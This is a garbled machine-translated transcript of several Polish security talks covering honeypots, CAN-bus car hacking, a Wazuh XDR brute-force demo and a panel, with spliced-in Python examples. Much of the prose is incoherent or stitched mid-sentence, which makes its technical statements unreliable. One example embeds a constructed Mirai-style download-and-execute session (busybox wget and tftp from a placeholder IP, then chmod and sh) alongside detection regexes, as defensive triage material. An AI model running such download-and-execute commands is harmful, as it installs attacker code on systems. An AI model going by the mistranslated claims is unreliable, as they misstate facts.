everything now. I can't catch some things well at the moment. And that's mainly RDP. I would have to put something there that records RDP. SQL Server, I have to implement it. And VNC is not available either. I used to do it, but I don't remember the ports. So now the question is how to use TLS? I said I was going to pass everything byte by byte, but I lied. Because in fact, you can... At the beginning of TLS there are three main features. As we can see, you can just use the SSL API and make a simple attack on the reference. And then you can see the data. Most of these robots don't check certificates.
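As an added example, not code from the honeypot project, the following classifier runs over a constructed Telnet session that mirrors the Mirai behaviour described above (look for a writable directory, try wget/tftp/curl, fall back to echo, mark executable, run) and tags each stage for triage of captured sessions; the IP address, script name and every line of the session are made up:

```python
"""Tag the stages of a captured Telnet honeypot session.

Added example, not the honeypot's own code. SAMPLE_SESSION is a
constructed transcript of what a client sent; it is only parsed here,
never executed. The classifier reports which download-and-execute
stages appear and which hosts the client tried to fetch from, so that
captured sessions can be sorted before someone looks at them by hand.
"""
import re

# Constructed sample session; 198.51.100.23 is a documentation-range address.
SAMPLE_SESSION = """\
enable
system
shell
sh
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
/bin/busybox wget http://198.51.100.23/x/bins.sh -O bins.sh
/bin/busybox tftp -g -r bins.sh 198.51.100.23
/bin/busybox echo -ne '\\x7f\\x45\\x4c\\x46\\x01\\x01\\x01\\x00' > .drop
chmod +x bins.sh
sh bins.sh
"""

# One regex per stage. Each is matched against a single command line.
PATTERNS = {
    "writable_dir_search": re.compile(r"\bcd\s+/tmp\b.*\|\|"),
    "download_wget": re.compile(r"\bwget\b"),
    "download_tftp": re.compile(r"\btftp\b"),
    "download_curl": re.compile(r"\bcurl\b"),
    "echo_file_drop": re.compile(r"\becho\b.*-n?e.*>\s*\S+"),
    "chmod_exec": re.compile(r"\bchmod\s+\+?x\b|\bchmod\s+7[0-7]{2}\b"),
    "execute_script": re.compile(r"^(?:sh|bash)\s+\S+|^\./\S+"),
}
URL_RE = re.compile(r"https?://[^\s'\"]+")
IP_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
DOWNLOAD_STAGES = {"download_wget", "download_tftp", "download_curl", "echo_file_drop"}


def classify_session(text):
    """Return the stages seen, download URLs/hosts, and an overall verdict."""
    tags, urls, hosts = set(), set(), set()
    for raw in text.splitlines():
        line = raw.strip()
        for tag, rx in PATTERNS.items():
            if rx.search(line):
                tags.add(tag)
        urls.update(URL_RE.findall(line))
        # Only lines that fetch something contribute download hosts.
        if any(tool in line for tool in ("wget", "tftp", "curl")):
            hosts.update(IP_RE.findall(line))
    if tags & DOWNLOAD_STAGES and "execute_script" in tags:
        verdict = "download-and-execute"
    elif tags & DOWNLOAD_STAGES:
        verdict = "download-only"
    else:
        verdict = "benign-or-recon"
    return {"tags": sorted(tags), "urls": sorted(urls),
            "hosts": sorted(hosts), "verdict": verdict}
```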

So there is no problem. Now the question is what about SSH? SSH connection starts with a magic byte. If I find it, I'm running something called SSH-MD, which is a very nice project for making a domain name for SSH. In the previous version, it was necessary to modify it a bit, now I have it without modification, from the day before yesterday. We are practicing the movement, it is not a very popular thing, but it works. And it records the proposed keys, which is cool, because sometimes people do scanning where a key will enter. They use the password. And the session commands. Demo. So, here we can see the SSHMD, but we can also see the user and

password. We can also see the session as it was. Here we have the commands that have been sent. Here we have what he got back to his terminal. Unfortunately, I'm not sure about that, but you can see what was sent there. Here you can also do something that you absolutely shouldn't do normally, so you can just write it out on the terminal and the terminal will interpret the ANSI sequences, so even the color is the same as what it was there. These were the differences between the system processes. SSH is a very interesting topic. If you look at the sessions of users, there is an actor who tries to use... These are not some passwords

for IoT devices, but it's just a long password. and it can actually log into the machine. This is something that I saw for the first time and they were not even published in the Internet. At the moment, there are some logs from the Internet. I'm going to skip it now, but it may be a nice topic for the future. And now the question: do only worms get into it? No, because there are some examples of scanning the Internet, some Internet of Things and so on. And there are also real people who are defying it. We have these scripts for parsing it, so in fact, it could be sent to some friendly Polish institution to watch such blogs.

Toodoo is a project I wrote and then I didn't deal with it much, so it's in a beta version. There are a lot of things to fix, it's just a bad thing. The worst thing is that it's written in C, which is not fashionable now. It would be useful to add support for other protocols, for example MS SQL, which has a lot of them. I would need some reporting tool, maybe someone would send me a request. And now the question is what has changed, how has it changed over time? I started it more or less in the last year and when I started it, there were a lot of villains, but a lot at the most. In June,

as I showed it at CONFidence, there were many fewer people. Either it was the end of the campaign or I have other ideas what could have happened there. There were still many dockerers. The campaign ended with SSH logging in with other messages. The campaign with Redis also ended and there were generally fewer connections. I was wondering that maybe this IP is already burned and maybe I should take the next one. And I took the next one. Just two days ago to see it. And two days ago I improved the SSH service, so now you could watch the transfer of the PICs. And that's basically it. We can sum up that this is a new type of halopota, we call it honeypot, corn,

and beets. Now, yes, it will be a little bit more complete presentation than before. It will be a presentation about automotive cybersecurity, which I started to be interested in some time ago. It was actually the first public presentation, because this presentation was published in CETA Online, in various formulas of CETA Online, in various formulas of VOD and at the most famous conferences. And I wanted to talk about these terms, definitions, - The fastest way to reach the maximum value is to use the diagnostic mode. The frames have their own frequency. They have the lowest value and they are treated in a period of time. is so processed that in front of the frames that concern whether

the windows fogged up and other sensors, these frames are treated with safety in the first place. This is an arbitration frame, quite important, sorry, in the arbitration field and the field of data in the standard CAN which is still used in the automotive industry, even though we have the more modern CAN FD. CAN 2.0 is the classic CAN, it has 8 bytes and 4 bits. So here is an example. This is a frame where we have the identifier and then the whole framework comes in. This is not allowed to have too many technical limitations. So, potential attacks, which we will show, cannot be refined, because these data cannot be shared. If we want to share these data within Playroad, we have

to use a little higher, more advanced protocols, e.g. car Ethernet, which can be used, or we know how to use it, or we know how complicated data are in our cars. So, CAN doesn't deal with them, it has limited bandwidth, and what it sees, I don't know. For example, the infotainment system. We can see how fast we are going in the car. They also read the frame of the engine. Anyway, from the ECUs that are responsible for these hard elements in our car. And after decoding, you can potentially read that there is this type of information. Speed, brake status, and steering angle. So these are the restrictions of this protocol. Of course, in the modern

train, there were not only CAN, there were also other lines and all of them in the network, in the computer network, they usually connect with one system, with one gateway. It's basically a switch for the car infrastructure. And we see potential problems, that the unhappiness gateway connects with the dashboard, and so on. and in addition to these comfortable cams, the steering wheel is used, but also the lower wheel arches, all of these are comfort cams, comfort beam, they are also more competitive with the engine, transmission and safety systems. So if it's not well segmented, like in a telecom, we have potential gaps in the time. Some researchers from Malta made a POC on BMW 3 series, a classic

BMW, fast, cool car, and they thought they would use a simulator of the vehicle's operation, i.e. a CAN frame generator. You can find a lot of such solutions on GitHub, phaser, and they started this simulator. They were writing standard frames, which are written as part of the CAN bus. But as part of this pseudo-bus, they also installed an external device. And it was an Arduino, a microcontroller. It is also used in the automotive industry as a component of ECU - electronic control unit. ECU is the most important vehicle in all functions. They introduced such a fake ECU in the lab environment and this information was sent to the main ECU responsible for what we see on our dashboard. And they made

two scenarios. One scenario is the first one, with the H button, where the frames that were coming were modified. I showed them 24 km/h. They were changed. And when the frames were changed, this dashboard, without checking any checksums, identifiers, or other levels of authentication, just accepted everything and posted it on the screen. It was real from BMW's SEVICS. Real, in Polish. The second scenario is also interesting. ECU which is connected to the dashboard of the data in the bus and it just didn't receive data, for example, related to airbags, ABS, they just didn't reach it, so a timeout occurred and it just made a mistake. So if someone has access directly to the bus, and some of the ECU,

apart from the fact that we are The first factor is that some of the ECU or these codes, to do something. We will discuss it in the example. Generally, on the LIN bus, these slaves will never work by themselves, because they are being used, but some can also be used by other individual slaves, if they are programmed for them. Here we will have such a deal with such an attack. In the data field, it is good. Here is an example of reality. We have here a master and two slaves. The master will control the lift engine. How does it work in a car? Try the buttons. I don't know if some of you have a kick. I'm thinking about such a car now.
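As an added example, not part of the talk or the researchers' PoC, here is a per-ID timing monitor that exposes the two effects described above for the dashboard (injected frames and the timeout when frames stop) from inter-arrival times alone, since a CAN receiver has no sender authentication or checksum to fall back on; the arbitration IDs, periods and the frame log are constructed sample values, not any vehicle's real map:

```python
"""Per-ID timing monitor for periodic CAN frames.

Added example, not from the BMW PoC described in the talk. Most signal
frames on a CAN bus are sent with a fixed period, so two attacks that
the receiving ECU cannot detect from frame contents are still visible
in timing: injection (a second sender adds frames, so the gap between
consecutive frames of one ID collapses) and starvation (frames stop
and the receiver times out). Timestamps are integer milliseconds; all
IDs, periods and payloads below are constructed sample values.
"""

# Constructed reference periods in ms per arbitration ID, as a receiver
# would learn them from a healthy bus. Made-up IDs, not a real DBC map.
EXPECTED_PERIOD_MS = {0x1A0: 10, 0x2C4: 20}


def monitor(frames, expected=EXPECTED_PERIOD_MS, tolerance=0.4, timeout_factor=3.0):
    """Check frames (timestamp_ms, can_id, data) in arrival order.

    Returns a list of (timestamp_ms, can_id, reason) alerts:
    - a gap shorter than period * (1 - tolerance) suggests a second sender;
    - a gap longer than period * timeout_factor is a starved receiver;
    - an ID outside the reference map is reported as unknown.
    """
    last_seen = {}
    alerts = []
    for ts, can_id, _data in frames:
        period = expected.get(can_id)
        if period is None:
            alerts.append((ts, can_id, "unknown id"))
            continue
        if can_id in last_seen:
            gap = ts - last_seen[can_id]
            if gap < period * (1 - tolerance):
                alerts.append((ts, can_id, "injection suspected: gap %d ms" % gap))
            elif gap > period * timeout_factor:
                alerts.append((ts, can_id, "starvation: gap %d ms" % gap))
        last_seen[can_id] = ts
    return alerts


def sample_frames():
    """Constructed log: healthy traffic, then interleaved spoofed frames, then silence."""
    genuine = bytes([0x18, 0x00, 0x00, 0x00])  # made-up payload
    spoofed = bytes([0xFF, 0x00, 0x00, 0x00])  # made-up payload from a second sender
    frames, t = [], 0
    for _ in range(5):                  # 0x1A0 every 10 ms: normal
        frames.append((t, 0x1A0, genuine))
        t += 10
    for _ in range(3):                  # spoofed frames land between genuine ones
        frames.append((t, 0x1A0, spoofed))
        t += 5
        frames.append((t, 0x1A0, genuine))
        t += 5
    t += 50                             # then the sender goes quiet for 50 ms
    frames.append((t, 0x1A0, genuine))
    return frames
```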

For your entertainment. The window button is the slave and if it gets a frame from the master, it asks it what button is there, and it will say "discard". Only when the information returns, it is sent to the actualization and the window is discarded. Simple. Another important thing. No external forces cause communication in the opposite direction to the CAN. Because in the table, the communication from the master and the response from the slave are also in the whole schedule table. So at the stage of vehicle construction, they must be programmed. Of course, every millisecond, the slaves are asked. And similarly here, of course, in the case of a lock, when the door is opened, the door is opened. And

something happens, the fact that a physical change occurs, it is a signal to the actuator. There was a Japanese study, where they tried to study and understand the feasibility of the mine. It is interesting that in this study, the answers were changed to the announcement of the mine by the master. And what's the point? In fact, incorrect or, well, actually, wrong information about this schedule was injected. Causing that when the slave responded to the master's question, he responded in this way, it was injected, this answer, it was very difficult. It flew to the bus and the slave, who also sent answers to this slave, did not send answers to the specific master. And now this is

one of the scenarios, that such false information can be shot down, block the traffic or replace it with a false traffic. The researchers found that although the CAN is a bus that is responsible for comfort in a car, in vans, the CAN is responsible for the sliding doors, connected to the Internet and can be updated by the network. We can see here that there are different types of ECUs, both those responsible for the entertainment, those that are concerned about the pressure in the exhaust, those that are related to our engine, the running day. And the most famous case is the hacking of the Jeep Cherokee. The case is important from the point of view of the topic, because

it was the first public demonstration that it could be done at all in 2015 or 2016. Two researchers at the American Black Hat presented the whole concept and explained that it is possible. In the Jeep Cherokee, there was a head unit with infotainment. This infotainment was based on Linux system and it was enough to have only IP address of this car. This is the IP address of this infotainment system. If we knew the IP address, then we could... Of course, there is a password, but it was generated based on the first start of the vehicle and it was a description of the date of the first start of the vehicle. So if we knew the date of

the first start of the vehicle, then the brute force was much narrower; not really a brute force at all, but just checking what the default password might be. So it is a simple thing. Unfortunately, between the head unit and the ECU responsible for various critical functions, the Renesas ECU, there was an open port, which was immediately used. It turned out that within these kinds of connections, these buses, there is no additional security. Once we reached the head unit, we could move on to other elements of the network, to the bus, to other ECUs. You can find a video on YouTube; I will not show it. The attack was demonstrated live, while the vehicle was

moving: the engine stopped, strange things started to happen on the infotainment system, the music started playing louder, and the whole vehicle was taken over. And here Chrysler had to recall 1,400,000 vehicles to the importer's base, which made this car part of automotive history. This is a still from the video that the hackers made available, and they actually reproduced their findings on this system and on this port. And as I mentioned earlier, we have to pay attention to the security of this port. It may be that the devices which, so to speak, ... um, which show how it is possible to turn such a diagnostic device into a device, a station, that will infect

the master and infect our vehicle. This is the most critical point. Of course, you know how it is; we need something for cars. The most critical elements are those that... If we have a computer system and we have access to the computer, then we sometimes rely on the open ports of our desktops or laptops. It is the same here, of course. - Excuse me, for electric cars, are there also charging plugs, but not the ones that are there? - Yes, yes. - I don't have a choice. - Of course. Maybe I'll just mention it in a moment. Um, I don't know. It's the kind of industry where, OK, something is slowly changing, and there are organizations that take care of security, but, you know, it's not a priority. So

far, it's not directly related to the passenger. It's a silly thing, but if I stand next to your car and try to connect, even if it tries to connect, it will notice me, it will even display this string, it will crash. This is also a head unit. As we know, currently there is no modern car without one. I would like to add one more vector to my picture, and in my opinion it is not at all irrelevant: look at the supply chain and software. There are third-party libraries, subcontractors who write code. All of this suddenly becomes very complicated, and identifying these risks at each of these specific points is simply difficult. We know that in supply chain attacks, incidents are really at

the top. Especially in the case of these software-defined vehicles, where at the end of the road there is our software in the car, at the level of the parties involved. We know how creative teams can be, so these kinds of things are definitely being studied. Over-the-air updates are quite critical in this context. I do not tolerate statistics in the security sector, because they say practically nothing. The thesis of Automotive Sabres is also confirmed. I do not believe that suddenly in 2021 and 2022 we had such a jump in newly discovered vulnerabilities. I'm just showing it, though it does not converge with this source; it would never agree with the data currently available. There are companies and organizations that

are studying the current vulnerabilities in cars, and practically all of these vulnerabilities are either due to the threat from the supply chain, or to integration with higher-level standards in various cases, or, to a lesser degree, to threats based on the takeover of certain functions in the vehicle. So these are the current trends. And when it comes to areas, the most dangerous are the cloud and onboard, that is, what is in the car, and not some attempts to hack the film as such so that it would later affect the safety of the car. We will also talk about this in a moment. This is a cool map that shows this problem well. The search engine is a kind of ASRG,

it connects to all the known databases, such as NVD, CVE, and ASRG's own internal one. You can search for entries related to the automotive industry. OWASP is also worth mentioning among those I have not yet mentioned. Fourthly, there is the lack of, or negligible, authentication. Nobody takes it seriously. And the fact that these old protocols are, unfortunately, quite dirty. Further, if we think about the cybersecurity of these systems, we have the MITRE matrix, well-known and liked by many. They recently started a cool project: the MITRE matrix now has analytical data on techniques and the detection of these techniques. It's a great update. It's cool to use in a SOC, but that's not the point. There is also a threat matrix, which was produced or supported

by Auto-ISAC, focused on the automotive industry. It looks like the matrix, and even the techniques are described in the context of the automotive environment. One of the techniques is Exploit via Removable Media. We have a USB drive, so we can use removable media in the car, or an SD card, because in some cars we update the navigation using such cards. My previous car was a "Krupek" and in it the SD card was inserted into the infotainment and then the update ran. And where did I get the navigation update? Of course, from the manufacturer. Another factor: the software of these stations is also covered by the NIS2 directive. So the automotive sector is the first regulation that should

affect the security of these systems. And an old thing, but I think it's interesting, because it shows... This is a so-called Game Boy. It's a device that connects to the ECU responsible for vehicle access. Because when we have a wireless key, there must be some connection. So it connects to the Game Boy and brute-forces it. It usually takes 20-30 minutes, because the device has all the stolen codes that are normally used to program vehicles and car keys. These codes were simply leaked somewhere, and this Game Boy simply has them all with it and tries to match the corresponding code to the vehicle. Such a device costs about 40 thousand zlotys. For some reason, Bulgarians

specialized in attacking this in Poland... It was probably about... about the knowledge that was gathered from different sources... not only verified, but also putting a USB stick into one of the servers... in the data center... The Russian who worked with Tesla didn't want to go to court because of that. They dragged Kriuchkov into their operations, and it was verified that he had a connection to something like that. At the same time as the USB stick was to be plugged in, there was supposed to be a strong attack, a decoy, a DDoS attack on Tesla, so that no one would pay attention to it. Well, they got the guy, the attack on Tesla didn't work, he was sentenced to 10 months,

probably; the trial was not long ago, so probably... So are we already live? We're already live, right? Okay, today we're going to try for the 3-minute record, because we have to be ready in half an hour. I think we can fit it in. Okay, the question is... I have a question for Krzysiek. If anyone wants to share some data, feel free. I work at Securitum, I'm a Linux admin. You probably know that we do audits, training, we publish books and we write cool posts. And before we move on, this is the prize in today's competition. If anyone wants it, there will be a contest question a little later. This is a new book by

Krzysztof Busiński about OSINT, for the OSINT people here, and something that is definitely useful. Okay, listen, we know what categories we have, right? Does anyone know anything of this? Who doesn't know these systems? I don't know. All of you? You don't know? I'm sorry. Okay, the car is a computer on wheels today, so you can't really get away from it. Tell me which car you want to buy. The car I want to buy has a carburettor, you know? And it's older than you. And he buys it only because... only because he is not old enough. So

we have analysing and detecting such threats at the endpoint. It is very important that it happens at the endpoint. We always remember that EDR works on the endpoint, not in the network, not in the infrastructure somewhere in the middle, but actually on the endpoints. And we do the root-cause analysis of this state. And this is very important in EDR, that they begin to learn. So when an EDR appears, it starts to learn slowly, it starts to understand what is really a normal state for us, and what is practically anomalous and should not happen at all. Have you ever heard of something like this? Does anyone know how it works? Who knows how MDR works? I'll give you

a book for it, but I see that you don't. Is there a friend who dares? Where? Down there. Where? It's not the same. They make decisions based on network traffic, whether it is suspicious or not. And what next? Based on this, some kind of reporting and actions. They normalize this network traffic, so we have a single format again. We don't have such flows yet, only those flows normalized to one format, in order to identify these anomalies. Come on, let's go. One, only two. They warn us. And it's very cool that some of these new NDRs, I mean, first of all, they warn us about potential attacks and the direction of these attacks. At the previous event, when I was working on a test of one vendor, I

could see the geolocation of this event. At least as long as someone is in the geolocation group, it actually works. Even if it doesn't know anything, doesn't have a database, it will start checking whether it isn't some kind of error. And internal threats, which are often downplayed, because few people, few companies, expect to have an insider. And an insider, apparently, is not such a small threat, because plugging in some pendrive, as we had in the previous presentation, can be deadly for us. - Is a pendrive a killer? - Also. - Yes, also.


automation and analysis. What does it consist of? It consists of the fact that when we build the appropriate rules, build the appropriate mechanisms, and tell it how to behave in certain situations, then at some point it will realize: "Aha, this is the same Mario, so let's go, thank you, goodbye." And they usually have a very simple... Looking at the four solutions I was dealing with, their producers are trying to make it as intuitive as possible. An analyst

doesn't have to be a technical person. An analyst has to be an analyst. They don't have to be an admin, they don't have to look through 30 tabs. They are supposed to get the complete data and then actually analyze it, i.e. check what is happening there. And this is the picture of the entire infrastructure, i.e. the correlation of this data from various sources. Why? What do we expect? Will we have only the endpoints? If we don't know what's happening on the firewalls, if we don't know what's happening on the switches, if we don't know what's happening on our machines that are plugged in somewhere but in fact are not monitored in any way... Does anyone work in automation?

With some OT? Or is it only IT sitting here? Only IT? Dear ladies and gentlemen, how do you monitor firewalls, for example? Not by product names, but how. I would like to know. I would like to play with it. You know, it's like with another Zabbix. Once you could run htop and check what's going on on the machine. Today you have Zabbix. The only question is what htop is good for today. You can only do so much. If you have 30 machines, it's already a hundred days. So and so. If I go to sleep, the other hackers also go to sleep. If you go to sleep, everyone goes to sleep. Will you close

your eyes or not? You won't close your eyes; it's my favorite example. You close your eyes, and you can't see. You can't see. Oh, oh. It's a bit more complex. It's more complex and it's better. I'll turn off the computer. It turned off. When a speaker comes, he has too much fun and then... Because instead of using some civilized device, some Logitech, to do this, he uses a flip-flop to present. Okay. And now, listen, my dears. What types of attacks could we find today with such an XDR? The simplest. The three simplest. Ransomware? What? Ransomware? Well, something would probably be found. What else? Something that is less popular today. I think that when quantum computers come

out, it will be very popular again.


And now, if we have this type of attack, then we usually have some symptoms of these attacks. If we have ransomware somewhere in our infrastructure, how can it be detected? How? How can we tell that we

have, for example, encryption going on? Suddenly we have too many IOPS on the disks of some machines, with zero load. I really liked this answer about CPU. When we turn it on, we turn on the agent, and we have system monitoring of these things. It is not so obvious that we can just check it. Let's see if it works. I'm not afraid to show you the password, because it's a secret for the morning and evening. At least admin/admin didn't work. Repeated four times. According to the instructions, four different words; admin, admin, admin, admin also works. I have here in this lab a very well-established setup. I have two agents set

up. And for these agents I have this communication, as is most often done, and they are working. When we go into it, somewhere further into these details, then besides the things we talked about here, you will see that it shows us, for example... I once did this at some training or lecture. I did a joke where participants came to me during the break and asked: "How would you update it now?" And we: "Okay, we'll update it." And we upgraded from Debian 12 to Debian 13. And it did go down. It did go down. But it needed a moment to just go through the system once more. It was a few minutes and

we had absolutely no information about what was happening in this small system. So we already have one thing that is definitely a threat to our network, because actually every machine of ours is somewhere in the network. Among the interesting things, we have a threat hunting module. And in this threat hunting module we can also see the file-level view. And see, CPU is very close; if the metrics grow, if it becomes visible that they exceed these alarm thresholds, then our XDR will inform us about it at that moment. If we start running out of disk somewhere, it will also start to inform us about it. I think this dashboard is so simple that it doesn't need

any special explanation here, I think. I assume that it is. Now yes, now yes, we have here some number of events, we even have the number of authentication failures. And we can try to start the tool Hydra. One, two, three, four. Good. What is it for? For the build. Good. I have it here somewhere; I have to see if it will be visible. It is visible. Good. We can start it. It's coming. It will fail in a moment. Why will it fail? Because, apart from the fact that we have a firewall somewhere, I don't know, like nftables, iptables, ufw or, I don't know, some other firewall,

there is an additional firewall through Wazuh, which is usually applied on client machines. And here something called Active Response is applied. I don't remember if it's on at the moment, because I think it's been running for a long time. We can check it now. And in general, it's about the fact that when a certain threshold is exceeded, let's see if it shows something here, 486.5. How long was it? Half a minute? A minute? It was, as you could see, slowly tuned. A few minutes can save us or not. Active Response in this case, as it is set here, works in such a way that when an alarm level is exceeded, this host, its IP, is cut off and thrown into hosts.deny.

So no communication is allowed. Whatever I try, as much as possible, from this machine where I started Hydra a moment ago, I will get a ban anyway. As long as the timeout hasn't passed, there will be no communication at all. Absolutely none. There is no ping, no ICMP, nothing. Nothing at all. This is a ban for the timeout period. I have this timeout, of course, here on the left; it's a short one, one or two minutes. - Nothing, it's the same as in the previous one. It's like that, but you know, here it automatically throws you into the corner, so you don't have to play with it. If this rule

actually works, then it will do it for you. You don't have to think about it. You look at the dashboard and see that something has started to happen. Your analyst can immediately move on to actually handling it, because it's really an incident, isn't it?
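The loop the demo shows (authentication failures counted per source IP, a ban applied once a threshold is crossed, the ban lifted again after a timeout) can be modelled outside the product in a few dozen lines. The block below is an added example written for this page; it is not the speaker's code and not part of Wazuh. The sshd-style log lines, the threshold, the window and the ban length are all constructed for illustration, and the dictionary of banned addresses stands in for the hosts.deny file the speaker mentions.

```python
"""Threshold-then-ban loop, modelled after the Wazuh Active Response demo.

Added example, not code from the talk or from the Wazuh project. Everything
below (log lines, threshold, window, ban length) is constructed for illustration.
"""
import re
from collections import defaultdict, deque

# Constructed sshd-style auth log lines; timestamps are plain seconds.
SAMPLE_EVENTS = [
    (0,   "Failed password for invalid user admin from 10.0.0.5 port 40001 ssh2"),
    (2,   "Failed password for root from 10.0.0.5 port 40002 ssh2"),
    (3,   "Accepted publickey for alice from 10.0.0.9 port 50000 ssh2"),
    (4,   "Failed password for root from 10.0.0.5 port 40003 ssh2"),
    (5,   "Failed password for root from 10.0.0.5 port 40004 ssh2"),
    (6,   "Failed password for root from 10.0.0.5 port 40005 ssh2"),
    (7,   "Failed password for root from 10.0.0.5 port 40006 ssh2"),
    (9,   "Failed password for invalid user test from 10.0.0.7 port 41000 ssh2"),
    (200, "Failed password for root from 10.0.0.5 port 40007 ssh2"),
]

# Matches both "Failed password for root from ..." and
# "Failed password for invalid user admin from ...".
FAILED_RE = re.compile(
    r"Failed password for (?:invalid user )?(\S+) from (\d{1,3}(?:\.\d{1,3}){3})"
)


class BruteForceResponder:
    """Counts auth failures per source IP in a sliding window and bans on threshold."""

    def __init__(self, threshold=5, window=60, ban_seconds=120):
        self.threshold = threshold          # failures within `window` that trigger a ban
        self.window = window                # seconds
        self.ban_seconds = ban_seconds      # the "timeout" after which the ban is lifted
        self.failures = defaultdict(deque)  # ip -> recent failure timestamps
        self.bans = {}                      # ip -> expiry time (hosts.deny analogue)
        self.actions = []                   # (time, "ban" | "unban", ip), oldest first

    def is_banned(self, ip, now):
        """True while a ban is active; expires the ban and records the unban on timeout."""
        expiry = self.bans.get(ip)
        if expiry is None:
            return False
        if now >= expiry:
            del self.bans[ip]
            self.actions.append((now, "unban", ip))
            return False
        return True

    def feed(self, ts, line):
        """Process one log line. Returns None, "dropped", "counted" or "banned"."""
        m = FAILED_RE.search(line)
        if m is None:
            return None                      # not an auth failure, nothing to count
        ip = m.group(2)
        if self.is_banned(ip, ts):
            return "dropped"                 # source is cut off; would never reach sshd
        recent = self.failures[ip]
        recent.append(ts)
        while recent and ts - recent[0] > self.window:
            recent.popleft()                 # forget failures outside the window
        if len(recent) >= self.threshold:
            self.bans[ip] = ts + self.ban_seconds
            self.actions.append((ts, "ban", ip))
            recent.clear()
            return "banned"
        return "counted"


def run(events, **kwargs):
    """Replay (timestamp, line) pairs; returns the responder and per-line verdicts."""
    responder = BruteForceResponder(**kwargs)
    verdicts = [(ts, responder.feed(ts, line)) for ts, line in events]
    return responder, verdicts


if __name__ == "__main__":
    responder, verdicts = run(SAMPLE_EVENTS)
    for ts, verdict in verdicts:
        print(f"t={ts:>3}s  {verdict}")
    print("actions:", responder.actions)
```

With the constructed input, 10.0.0.5 is banned at t=6 s on its fifth failure, its next attempt at t=7 s is dropped without being counted, and the ban expires at t=126 s so the attempt at t=200 s is counted again from zero; 10.0.0.7 never crosses the threshold. The sliding window matters: failures older than `window` seconds are discarded, so a slow, spread-out guess rate stays below the threshold, which is the trade-off the speaker alludes to when saying the level was "slowly tuned".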

In this particular case, we have a lot of nice rules already written. We have 4,500 rules written, but that doesn't mean that this is all we can do. We can also write our own, completely as we want, but we have to... It will be boring. I have it set up on a virtual machine that has 4 GB and 2 vCPUs. And it's bored at the moment. On the Wazuh website you have something like: up to 1000 agents, 4 GB is enough, if you want. Generally, what they recommend as a minimum is 2 GB. It should do. The network works. The agent is doing nothing at all, actually. But memory usage over time is not very good. The

question is, in general, one problem. If you have a tube, it's cool, you can have it. If you have a CD, it must do something more interesting than just a tube. It's a punishment. To do something more interesting, you must have some rules in your head. If you have a CD at home, you can add it to your home. It won't disturb your YouTube watching, I can confirm that. What are you doing? Do you think that an agent's smoothing can be harmful? An agent's smoothing? I know. We can test it in a moment, if you want. And we'll think about whether it's a

source of harm. Yes. Maybe it's already been a month since the system started running?

I'm checking these passwords. In any case, I'm checking them, because I think I have too many systems in my head and I'm starting to get confused. I'm wondering whether you have two agents, or you actually have three? One will show up, the other will move, disappear, as I did recently. And generally, I know that I have two agents. It didn't work. There is some communication, but I don't know what to do with it. Generally speaking, as far as I remember, keys are exchanged between the agent and the server. Just like there is this wizard: it gives you the script and the key is already there. I don't know the key either. I mean... There

you only give the server address and the agent name. Yes. And during installation... Yes, for sure. I'll tell him and he'll be safe right away. Okay, listen. When enrolling, it doesn't ask for a password. It doesn't ask. In this way, the committee of the National Security Service and the Department of the Interior will be able to communicate with each other without any chance that they will not know. We will probably test the topic. This machine is offline. When it connects to the network again, it will automatically come back. If you have a device somewhere in the network and it goes down, we will have the information that it has gone down. Exactly. Does it

report what it did last time, when it was offline? Exactly. Or does it not change it? Exactly.

You have to pass it to the other side. To the second one, the middle right. The middle right. Typical information, who has it? It was so cozy for a moment. Almost like at home. When you explain the concept, I think about these people. Krzysiu, are we having a panel discussion, or are we going? You are an expert; everyone who has ever presented can be an expert. I'll throw out the question: how many are willing? We have one. No, no, no. You're standing in the same place, aren't you? Here you go. So we have a cryptography specialist. Maybe another cryptography specialist will come. Who will bid more? Maybe these two won't be enough. We'll leave the chair. I don't want to. I'm

afraid that, if you consider it, the less you know about something, the more authoritative you are. His take, this, that. This is a good idea. Whoever turns back now. We invite Mr. Adversary, Mr. Mac, who else? Minas, come on. I can also shout. I don't think you'll get out of it. Maybe we put everyone on one side so he can set the camera so that it can be seen. So, Krzysiek, are we going to kill each other? I will not move you. I understand. Some people can't speak without hearing. Come on, come on, come on. Okay, I hope you have a zero package. Two more chairs. Don't be shy. Every speaker today,

come on. Come on, come on, come on. You have been presenting for 10 years in a row, so you are also very good. Okay, who should I pick here? Mr. Adversary, come on. And Mr. Kaczuszkowy, I invite you to do it. No, forget it. Why? Well, think about it, which specialist... - I have a friend next to me, he's a great guy, a guy who is better than me at Linux. - Don't exaggerate. - A guy who... - Well, go and get him, there's none. - No, no. - I'll bring the chair. - No, thanks. - Okay. - Well, there will be one empty chair. - You can sit here, closer to your colleagues, sit in

such a chair. - But look, she didn't take me, she only wanted you. Well, the first question for everyone. What's new in red teaming in Poland? It's Boris, it's not Boris, it's not red teaming. Does anyone do red teaming in Poland? Is anyone from Poland? I don't know, I'm not in Poland. I don't know either. This side is not in Poland. This side doesn't do red teaming. Does anyone do red teaming? Is there a person in the audience who does red teaming? Now they are afraid to say so, in case they don't get the pass. So we don't know what's going on. Who will be the responsible one? I am. What's going on in red teaming in Poland? Question for Mac. How did you

like the salad? It's fucking delicious. But it's not a salad. I don't know if there is any salad. Great. I heard that the one you ate at the third edition was very tasty. Who remembers that? Ok, great. Another question, and here for each of you, seriously. Please introduce yourselves to the audience and tell us in two or three words what you do. Please. My name is Grzegorz Grubel, I work as a security engineer at CivicPro, I've been working in the security industry for 12 years, I work at Security8 in my free time, and I work on the Asperger's portal, which is a private initiative. Thank you very much. I am Oskar. I am a professional, I write letters in order and

then people read them. And I write mainly about what is happening in this space, in the context of various incidents. I like doing it very much. I'm 12 years old. My name is Mac. I've been doing malware for 12 years. My name is Michał Trojnara. I can't tell you what I do professionally, but I'm a hobbyist and I run a few open source projects, such as osslsigncode, stunnel, and P11. Great. Question for the editor: have you ever written malware? No. Thank you very much. Question for the pilot: when is the next episode of Missiles in the trailer? I don't know, it depends. What episode? The weather. Great. Question for the trojan.

When will stunnel support the internet? In what sense? When will it be possible to set up an stunnel connection via the internet? But why? Good question. So never. Okay. Now a question for everyone: how to start in security? Standard, as they do. Don't start. Exactly, don't start. I've been saying "don't start" in security for so many years, what a pity. Everyone's losing their hair. Are you afraid of work? I'm a picky eater, I'm sorry. You have to like breaking things. If you don't like breaking things, if you don't like breaking toys, it's better to do something else. Maybe not always. - Take care of security. - Not everyone has to. - Nervous work. - Very. - Healthy. - The

